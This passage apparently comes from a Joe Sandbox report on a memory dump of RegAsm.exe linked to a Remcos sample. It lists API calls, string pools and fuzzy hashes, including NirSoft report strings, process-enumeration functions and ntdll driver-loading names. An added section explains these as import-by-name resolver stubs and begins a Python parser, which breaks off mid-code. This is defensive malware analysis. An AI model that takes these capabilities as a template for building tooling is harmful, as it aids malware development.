                            • BeginDeferWindowPos.USER32(00000004), ref: 00411281
                            • DeferWindowPos.USER32(?,?,00000000,00000000,00000000,?,?,00000004), ref: 004112A4
                            • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000006), ref: 004112C3
                            • DeferWindowPos.USER32(?,?,00000000,00000000,000000DC,?,?,00000004), ref: 004112EE
                            • DeferWindowPos.USER32(?,00000000,00000000,00000000,?,?,000000DC,00000004), ref: 00411306
                            • EndDeferWindowPos.USER32(?), ref: 0041130B
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: Window$Defer$Rect$BeginClientItemPoints
                            • String ID:
                            • API String ID: 552707033-0
                            • Opcode ID: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
                            • Instruction ID: 1a89c9de14f4e003cb1acc22e2fe5cfe68aec74c13575a54a2aa846d798aa5ff
                            • Opcode Fuzzy Hash: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
                            • Instruction Fuzzy Hash: 3B41D375900209FFEB11DFA8DD89FEEBBBAFB48300F104469F655A61A0C771AA50DB14
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: memset$_snwprintf
                            • String ID: %%0.%df
                            • API String ID: 3473751417-763548558
                            • Opcode ID: d3ed19b3c5d3f5d27fcb945595af099acb5609e53fc24cbfd77fa4eb0abb8f2a
                            • Instruction ID: e3e507119e413e1699737691dcc770ce903c50d69a4f0c7cc4f670013a5326e5
                            • Opcode Fuzzy Hash: d3ed19b3c5d3f5d27fcb945595af099acb5609e53fc24cbfd77fa4eb0abb8f2a
                            • Instruction Fuzzy Hash: 2D318F71800129BBEB20DF95CC85FEB77BCFF49304F0104EAB509A2155E7349A94CBA9
                            APIs
                            • SetTimer.USER32(?,00000041,00000064,00000000), ref: 004060C7
                            • KillTimer.USER32(?,00000041), ref: 004060D7
                            • KillTimer.USER32(?,00000041), ref: 004060E8
                            • GetTickCount.KERNEL32 ref: 0040610B
                            • GetParent.USER32(?), ref: 00406136
                            • SendMessageW.USER32(00000000), ref: 0040613D
                            • BeginDeferWindowPos.USER32(00000004), ref: 0040614B
                            • EndDeferWindowPos.USER32(00000000), ref: 0040619B
                            • InvalidateRect.USER32(?,?,00000001), ref: 004061A7
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: Timer$DeferKillWindow$BeginCountInvalidateMessageParentRectSendTick
                            • String ID: A
                            • API String ID: 2892645895-3554254475
                            • Opcode ID: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
                            • Instruction ID: 3d646c34c65c30a23a549f03b0efc12359fcfb722ff8df3f2fd47db5f06942f8
                            • Opcode Fuzzy Hash: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
                            • Instruction Fuzzy Hash: 67318F75240304BBEB205F62DC85F6A7B6ABB44742F018539F3067A5E1C7F998A18B58
                            APIs
                            • LoadMenuW.USER32(?,?), ref: 0040D97F
                              • Part of subcall function 0040D7A7: GetMenuItemCount.USER32(?), ref: 0040D7BD
                              • Part of subcall function 0040D7A7: memset.MSVCRT ref: 0040D7DC
                              • Part of subcall function 0040D7A7: GetMenuItemInfoW.USER32 ref: 0040D818
                              • Part of subcall function 0040D7A7: wcschr.MSVCRT ref: 0040D830
                            • DestroyMenu.USER32(00000000), ref: 0040D99D
                            • CreateDialogParamW.USER32(?,?,00000000,0040D952,00000000), ref: 0040D9F2
                            • GetDesktopWindow.USER32 ref: 0040D9FD
                            • CreateDialogParamW.USER32(?,?,00000000), ref: 0040DA0A
                            • memset.MSVCRT ref: 0040DA23
                            • GetWindowTextW.USER32(00000005,?,00001000), ref: 0040DA3A
                            • EnumChildWindows.USER32(00000005,Function_0000D898,00000000), ref: 0040DA67
                            • DestroyWindow.USER32(00000005), ref: 0040DA70
                              • Part of subcall function 0040D5D6: _snwprintf.MSVCRT ref: 0040D5FB
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: Menu$Window$CreateDestroyDialogItemParammemset$ChildCountDesktopEnumInfoLoadTextWindows_snwprintfwcschr
                            • String ID: caption
                            • API String ID: 973020956-4135340389
                            • Opcode ID: 5e414436bb8e275bf9a16e2693900a7463b03ad76ebaf029bad5c7ef584cf34d
                            • Instruction ID: d77e6bedd7727d4aace6f5c0bd160524984489d6dc7b24eaa8e7ecc9459ec1fc
                            • Opcode Fuzzy Hash: 5e414436bb8e275bf9a16e2693900a7463b03ad76ebaf029bad5c7ef584cf34d
                            • Instruction Fuzzy Hash: 60319072900208BFEF11AF91DC85EAA3B78FF04315F10843AF909A61A1D7799D58CF59
                            Strings
                            • <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">, xrefs: 00410A70
                            • <table dir="rtl"><tr><td>, xrefs: 00410B00
                            • <br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>, xrefs: 00410B3C
                            • <meta http-equiv='content-type' content='text/html;charset=%s'>, xrefs: 00410ADD
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: memset$_snwprintf$wcscpy
                            • String ID: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">$<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>$<meta http-equiv='content-type' content='text/html;charset=%s'>$<table dir="rtl"><tr><td>
                            • API String ID: 1283228442-2366825230
                            • Opcode ID: 2928c1e4db6f8540118cb54ef1ff53e3c28d5a36283f281326c9c00f9b8dcb63
                            • Instruction ID: da896b014e5ee892582fb8e7d48e4383de9842bc572d8210300f5843ce7472f7
                            • Opcode Fuzzy Hash: 2928c1e4db6f8540118cb54ef1ff53e3c28d5a36283f281326c9c00f9b8dcb63
                            • Instruction Fuzzy Hash: 5C2182B69002197BDB21AB95CC41EDE77BCAF08785F0040ABF549D3151DA789F888BA9
                            APIs
                            • wcschr.MSVCRT ref: 00413972
                            • wcscpy.MSVCRT ref: 00413982
                              • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409806
                              • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409810
                              • Part of subcall function 004097F7: _memicmp.MSVCRT ref: 0040982B
                            • wcscpy.MSVCRT ref: 004139D1
                            • wcscat.MSVCRT ref: 004139DC
                            • memset.MSVCRT ref: 004139B8
                              • Part of subcall function 00409DD5: GetWindowsDirectoryW.KERNEL32(0045DC58,00000104,?,00413A11,?,?,00000000,00000208,?), ref: 00409DEB
                              • Part of subcall function 00409DD5: wcscpy.MSVCRT ref: 00409DFB
                            • memset.MSVCRT ref: 00413A00
                            • memcpy.MSVCRT ref: 00413A1B
                            • wcscat.MSVCRT ref: 00413A27
                            Strings
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: wcscpy$memsetwcscatwcslen$DirectoryWindows_memicmpmemcpywcschr
                            • String ID: \systemroot
                            • API String ID: 4173585201-1821301763
                            • Opcode ID: e4551322c16c9acef98fc86a4838192e22c045fa3321ccd57a54cdfa3ae28df9
                            • Instruction ID: a9582ad2fab6187976d7b5f1d827ce349b207672d34ede1993470c6c3fb504e1
                            • Opcode Fuzzy Hash: e4551322c16c9acef98fc86a4838192e22c045fa3321ccd57a54cdfa3ae28df9
                            • Instruction Fuzzy Hash: 7D21F6F68053146AE720FB619C86EEF73EC9F06719F20415FF115A20C6EA7C9A844B5E
                            APIs
                            • GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                            Strings
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: HandleModule
                            • String ID: NtLoadDriver$NtOpenSymbolicLinkObject$NtQueryObject$NtQuerySymbolicLinkObject$NtQuerySystemInformation$NtResumeProcess$NtSuspendProcess$NtUnloadDriver$ntdll.dll
                            • API String ID: 4139908857-2887671607
                            • Opcode ID: 57b3ef5f97466978e1990f74adf29af07ff290b7ce4571feabf87054e0031f76
                            • Instruction ID: 8dd6b0f06cc06780b82abcfa5335c49c30c65db347d43124f897848efd9f6b7c
                            • Opcode Fuzzy Hash: 57b3ef5f97466978e1990f74adf29af07ff290b7ce4571feabf87054e0031f76
                            • Instruction Fuzzy Hash: 8C015E75D48324AACB339F75AD09A053FB1EF04797B1004B7A80492266DAF9815CDE4C
                            APIs
                              • Part of subcall function 0040A32D: SetFilePointer.KERNEL32(0040C2BF,?,00000000,00000000,?,0040C0C5,00000000,00000000,?,00000020,?,0040C255,?,?,*.*,0040C2BF), ref: 0040A33A
                            • GetFileSize.KERNEL32(00000000,00000000), ref: 0040C0D4
                              • Part of subcall function 0040BFF3: _memicmp.MSVCRT ref: 0040C00D
                              • Part of subcall function 0040BFF3: memcpy.MSVCRT ref: 0040C024
                            • memcpy.MSVCRT ref: 0040C11B
                            • strchr.MSVCRT ref: 0040C140
                            • strchr.MSVCRT ref: 0040C151
                            • _strlwr.MSVCRT ref: 0040C15F
                            • memset.MSVCRT ref: 0040C17A
                            • CloseHandle.KERNEL32(00000000), ref: 0040C1C7
                            Strings
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: Filememcpystrchr$CloseHandlePointerSize_memicmp_strlwrmemset
                            • String ID: 4$h
                            • API String ID: 4019544885-1856150674
                            • Opcode ID: 74984e11edfdd2211d0d35a95e6cfe2b897958e94349246af9e5f94d48ef065d
                            • Instruction ID: ad7b68c589633d756b108d453181f98220e50dbf4ed18f1a1dc8c2c6e1bbf79d
                            • Opcode Fuzzy Hash: 74984e11edfdd2211d0d35a95e6cfe2b897958e94349246af9e5f94d48ef065d
                            • Instruction Fuzzy Hash: F531C2B2800218FEEB20EB54CC85EEE73BCEF05354F14416AF508A6181D7389F558FA9
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: Menu$Itemmemset$CountInfoModifywcscatwcschr
                            • String ID: 0$6
                            • API String ID: 4066108131-3849865405
                            • Opcode ID: 0289309123c9ab86839131df51d1afc7e9f627d47cda6d3754f054bafba8353e
                            • Instruction ID: 23fd2219eb4cf2a86962fa47610fb6a66e7712bfbd77636794901fa2ff6d3352
                            • Opcode Fuzzy Hash: 0289309123c9ab86839131df51d1afc7e9f627d47cda6d3754f054bafba8353e
                            • Instruction Fuzzy Hash: 1C317C72808344AFDB209F95D84499FB7E8FF84314F00493EFA48A2291D775D949CB5B
                            APIs
                            • memset.MSVCRT ref: 004082EF
                              • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                            • memset.MSVCRT ref: 00408362
                            • memset.MSVCRT ref: 00408377
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: memset$ByteCharMultiWide
                            • String ID:
                            • API String ID: 290601579-0
                            • Opcode ID: 2c5b7af1b6ad7fa84976a25c4c1a6b62738b238711a472a87ec5ace72f6ab842
                            • Instruction ID: eff1c4cb9ad8ed09cf65616da307521f953f8cb6273bc8e87bbfe44e88666a06
                            • Opcode Fuzzy Hash: 2c5b7af1b6ad7fa84976a25c4c1a6b62738b238711a472a87ec5ace72f6ab842
                            • Instruction Fuzzy Hash: E1716C72E0421DAFEF10EFA1EC82AEDB7B9EF04314F14406FE104B6191EB795A458B59
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: ??3@$wcslen
                            • String ID:
                            • API String ID: 239872665-3916222277
                            • Opcode ID: 6ece4f15149c4f8b0f1e95fdfa43d3662bfdaf9dea83468c5f0cbecd63c28e51
                            • Instruction ID: 6c84a66137f0c35b9d0eb965e4703c645d554f15bb1c6f80accdbf0b715e4580
                            • Opcode Fuzzy Hash: 6ece4f15149c4f8b0f1e95fdfa43d3662bfdaf9dea83468c5f0cbecd63c28e51
                            • Instruction Fuzzy Hash: 78614A70E0421ADADF28AF95E6485EEB771FF04315F60807BE411B62D1EBB84981CB5D
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: memcpywcslen$_snwprintfmemset
                            • String ID: %s (%s)$YV@
                            • API String ID: 3979103747-598926743
                            • Opcode ID: 2040f1418fb7f55927111411806f4302e3b16a8f1d7874ce907b9bb2b5999412
                            • Instruction ID: 06bfc13611ed198a4270a5cd43788582667178ba612a9453d6f3368808cd6753
                            • Opcode Fuzzy Hash: 2040f1418fb7f55927111411806f4302e3b16a8f1d7874ce907b9bb2b5999412
                            • Instruction Fuzzy Hash: 31216F72900219BBDF21DF55CC45D8BB7B8BF04318F018466E948AB106DB74EA188BD9
                            APIs
                            • LoadLibraryExW.KERNEL32(netmsg.dll,00000000,00000002,?,?,?,?,00409764,?), ref: 0040A686
                            • FormatMessageW.KERNEL32(00001100,00000000,?,00000400,?,00000000,00000000,?,?,?,?,00409764,?), ref: 0040A6A4
                            • wcslen.MSVCRT ref: 0040A6B1
                            • wcscpy.MSVCRT ref: 0040A6C1
                            • LocalFree.KERNEL32(?,?,00000400,?,00000000,00000000,?,?,?,?,00409764,?), ref: 0040A6CB
                            • wcscpy.MSVCRT ref: 0040A6DB
                            Strings
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: wcscpy$FormatFreeLibraryLoadLocalMessagewcslen
                            • String ID: Unknown Error$netmsg.dll
                            • API String ID: 2767993716-572158859
                            • Opcode ID: 6af7a682c2b6d94d5c313714e0e524a7557e97864fcb7fd89b068039d1905f7d
                            • Instruction ID: f30f617898fcbe25dfcd40b25f3134c3ee1324ef56ff669fd92f7ad18b117fee
                            • Opcode Fuzzy Hash: 6af7a682c2b6d94d5c313714e0e524a7557e97864fcb7fd89b068039d1905f7d
                            • Instruction Fuzzy Hash: 77014772104214BFE7151B61EC46E9F7B3DEF06795F24043AF902B10D0DA7A5E10D69D
                            APIs
                            Strings
                            • unable to open database: %s, xrefs: 0042F84E
                            • database is already attached, xrefs: 0042F721
                            • cannot ATTACH database within transaction, xrefs: 0042F663
                            • too many attached databases - max %d, xrefs: 0042F64D
                            • attached databases must use the same text encoding as main database, xrefs: 0042F76F
                            • database %s is already in use, xrefs: 0042F6C5
                            • out of memory, xrefs: 0042F865
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: memcpymemset
                            • String ID: attached databases must use the same text encoding as main database$cannot ATTACH database within transaction$database %s is already in use$database is already attached$out of memory$too many attached databases - max %d$unable to open database: %s
                            • API String ID: 1297977491-2001300268
                            • Opcode ID: fafdf879e702536ae0a8da4e3c7de2ba30e48f0de6d41113ccb8534cd7e7e00e
                            • Instruction ID: 2d624c67d108d3170f37657fe85980b6deaf3b4166a4b31ce602698a835437d0
                            • Opcode Fuzzy Hash: fafdf879e702536ae0a8da4e3c7de2ba30e48f0de6d41113ccb8534cd7e7e00e
                            • Instruction Fuzzy Hash: 4791C131B00315AFDB10DF65E481B9ABBB0AF44318F94807FE8059B252D778E949CB59
                            APIs
                            • LockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004178DF
                            • Sleep.KERNEL32(00000001), ref: 004178E9
                            • GetLastError.KERNEL32 ref: 004178FB
                            • UnlockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004179D3
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: File$ErrorLastLockSleepUnlock
                            • String ID:
                            • API String ID: 3015003838-0
                            • Opcode ID: 2bcaca4b1abb42dedd91daaceb1976ea0637d726691221ef1964d55ebaf63db6
                            • Instruction ID: bb7e89fefddb53edf96b8819cb9ac805ac4f8ca395f1f2490f4f27a155f14dd5
                            • Opcode Fuzzy Hash: 2bcaca4b1abb42dedd91daaceb1976ea0637d726691221ef1964d55ebaf63db6
                            • Instruction Fuzzy Hash: C741FFB515C3029FE3209F219C05BA7B7F1BFC4714F20092EF5A556280CBB9D8898A6E
                            APIs
                            • OpenProcess.KERNEL32(00000410,00000000,00000000,?,?,00000000,?,004133E1,00000000,?), ref: 00413A7A
                            • memset.MSVCRT ref: 00413ADC
                            • memset.MSVCRT ref: 00413AEC
                              • Part of subcall function 00413959: wcscpy.MSVCRT ref: 00413982
                            • memset.MSVCRT ref: 00413BD7
                            • wcscpy.MSVCRT ref: 00413BF8
                            • CloseHandle.KERNEL32(?), ref: 00413C4E
                            Strings
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: memset$wcscpy$CloseHandleOpenProcess
                            • String ID: 3A
                            • API String ID: 3300951397-293699754
                            • Opcode ID: 8542788a6fbd662e622ac6317d91a932690acc9b8880ba19fbfc79209a0c02cc
                            • Instruction ID: 1dd795ac5698d536b98d54c3d0ab6bca04534a71b571f2ddc62e59a9adc8dd8d
                            • Opcode Fuzzy Hash: 8542788a6fbd662e622ac6317d91a932690acc9b8880ba19fbfc79209a0c02cc
                            • Instruction Fuzzy Hash: 3C514D71108341AFD720DF25DC84ADBB7E8FF84705F004A2EF59992291EB75DA44CBAA
                            APIs
                            • GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                            • wcscpy.MSVCRT ref: 0040D1B5
                              • Part of subcall function 0040D626: memset.MSVCRT ref: 0040D639
                              • Part of subcall function 0040D626: _itow.MSVCRT ref: 0040D647
                            • wcslen.MSVCRT ref: 0040D1D3
                            • GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                            • LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                            • memcpy.MSVCRT ref: 0040D24C
                              • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D0CC
                              • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D0EA
                              • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D108
                              • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D126
                            Strings
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: ??2@$HandleModule$LoadString_itowmemcpymemsetwcscpywcslen
                            • String ID: strings
                            • API String ID: 3166385802-3030018805
                            • Opcode ID: 1ff794482afb279d074c0027ae841dfa169eb318e5c6685fac8801d3cb652815
                            • Instruction ID: f4589d763452722e7ce024d248fd6f149fceb83749f413ad0df853fa0cd60d20
                            • Opcode Fuzzy Hash: 1ff794482afb279d074c0027ae841dfa169eb318e5c6685fac8801d3cb652815
                            • Instruction Fuzzy Hash: 78418D75D003109BD7369FA8ED809263365FF48306700047EE942972A7DEB9E886CB5D
                            APIs
                            • memset.MSVCRT ref: 00411AF6
                              • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                            • wcsrchr.MSVCRT ref: 00411B14
                            • wcscat.MSVCRT ref: 00411B2E
                            Strings
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: FileModuleNamememsetwcscatwcsrchr
                            • String ID: AE$.cfg$General$EA
                            • API String ID: 776488737-1622828088
                            • Opcode ID: b6de0e43a8c0916aab6107a9d450eab560a3e9a3f2f4477a4909840308f89baa
                            • Instruction ID: 09e7cc653f6f297407560738dd106e03d424c3973b250f6ebd227ee33dbedd02
                            • Opcode Fuzzy Hash: b6de0e43a8c0916aab6107a9d450eab560a3e9a3f2f4477a4909840308f89baa
                            • Instruction Fuzzy Hash: 9611B93250022C66DF20EF51DC85ACE7378FF54754F1004ABE908B7142DB74ABC88B99
                            APIs
                            • memset.MSVCRT ref: 0040D8BD
                            • GetDlgCtrlID.USER32(?), ref: 0040D8C8
                            • GetWindowTextW.USER32(?,?,00001000), ref: 0040D8DF
                            • memset.MSVCRT ref: 0040D906
                            • GetClassNameW.USER32(?,?,000000FF), ref: 0040D91D
                            • _wcsicmp.MSVCRT ref: 0040D92F
                              • Part of subcall function 0040D76E: memset.MSVCRT ref: 0040D781
                              • Part of subcall function 0040D76E: _itow.MSVCRT ref: 0040D78F
                            Strings
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: memset$ClassCtrlNameTextWindow_itow_wcsicmp
                            • String ID: sysdatetimepick32
                            • API String ID: 1028950076-4169760276
                            • Opcode ID: eb3a53bf7b2f710d742758b2cc733c17be47e3e423eab4b3bd20e98515a4ffe8
                            • Instruction ID: 7fefccf0184427ff86f81c2eca1e08be5bb75bf3b76f29e65549559b88306b24
                            • Opcode Fuzzy Hash: eb3a53bf7b2f710d742758b2cc733c17be47e3e423eab4b3bd20e98515a4ffe8
                            • Instruction Fuzzy Hash: 061177769002197AEB10EB91DC49EDF7BACEF05750F0040BAF508D2192EB749A85CA59
                            APIs
                            • LoadLibraryW.KERNEL32(comctl32.dll), ref: 004044C3
                            • FreeLibrary.KERNEL32(00000000), ref: 004044E9
                            • MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                            Strings
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: Library$FreeLoadMessage
                            • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
                            • API String ID: 3897320386-317687271
                            • Opcode ID: 4451af1fa5a3c13e403cd0bd9a94ec580510088b32cd85f0031bb893d40152de
                            • Instruction ID: 703d86131c3dcb59aab6256491fb2853d543806c906e0642a055f98632e98cc8
                            • Opcode Fuzzy Hash: 4451af1fa5a3c13e403cd0bd9a94ec580510088b32cd85f0031bb893d40152de
                            • Instruction Fuzzy Hash: B201D6757502217BE7112FB69C49F7B7A9CFF82749B000035E601E2180EAB8D901926D
                            APIs
                              • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                              • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                              • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                              • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                              • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(00000000), ref: 0040A87B
                              • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                            • FreeLibrary.KERNEL32(00000000), ref: 00413951
                            Strings
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
                            • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                            • API String ID: 4271163124-70141382
                            • Opcode ID: 041abbf71437061a0f134c3fe1786c70626f7864bc8708fd51d9cd322498a069
                            • Instruction ID: 1ed0e205fb1d3ca6b4a3c81c58fecbd4dea9624ac3f9f6029147382c5f000437
                            • Opcode Fuzzy Hash: 041abbf71437061a0f134c3fe1786c70626f7864bc8708fd51d9cd322498a069
                            • Instruction Fuzzy Hash: 7301B5B1905312DAD7705F31AE40B6B2FA45B81FA7B10003BEA00D1286DBFCC8C5DA6E
                            APIs
                            • GetModuleHandleW.KERNEL32(kernel32.dll,?,0041339D), ref: 0041384C
                            Strings
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: HandleModule
                            • String ID: CreateToolhelp32Snapshot$Module32First$Module32Next$Process32First$Process32Next$kernel32.dll
                            • API String ID: 4139908857-3953557276
                            • Opcode ID: 31f1d1be7c9a4426e09052d790ecb19dd0b8106983b19d46a1984a4086cae070
                            • Instruction ID: ced2a49a11d8a5ad7e856d80fa96ce31c371be68fc2c17877008b9264e9f9212
                            • Opcode Fuzzy Hash: 31f1d1be7c9a4426e09052d790ecb19dd0b8106983b19d46a1984a4086cae070
                            • Instruction Fuzzy Hash: 58F08631900317A9E7206F357D41B672AE45B86F83714017BFC04D12D9DB7CE98A9B6D
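The three records above that pair a single GetModuleHandleW or LoadLibraryW call with a string pool of export names (ntdll.dll with the Nt* names, psapi.dll with the EnumProcesses family, kernel32.dll with the Toolhelp32 family) are the shape of an import-by-name resolver stub: the function looks the DLL up, then walks a list of names with GetProcAddress so none of them appear in the import table. The example below is added here and is not code from Joe Sandbox or from the Remcos sample. It parses this report's per-function record format into structured records and applies that heuristic; the record layout is inferred from the page, the resolver heuristic is this example's own assumption, and the excerpt it runs on is constructed by condensing records shown on this page (Opcode ID and Instruction ID lines dropped).

```python
"""Parser for the per-function records in this Joe Sandbox report ('APIs / Strings /
Similarity' blocks) with a check for import-by-name resolver stubs. Added example,
not Joe Sandbox or Remcos code; layout inferred from the page, heuristic assumed."""
import re
from dataclasses import dataclass, field

# Constructed excerpt condensed from records on this page (ID lines dropped).
SAMPLE = """\
APIs
• GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
Strings
Similarity
• API ID: HandleModule
• String ID: NtLoadDriver$NtOpenSymbolicLinkObject$NtQueryObject$NtQuerySymbolicLinkObject$NtQuerySystemInformation$NtResumeProcess$NtSuspendProcess$NtUnloadDriver$ntdll.dll
• Instruction Fuzzy Hash: 8C015E75D48324AACB339F75AD09A053FB1EF04797B1004B7A80492266DAF9815CDE4C
APIs
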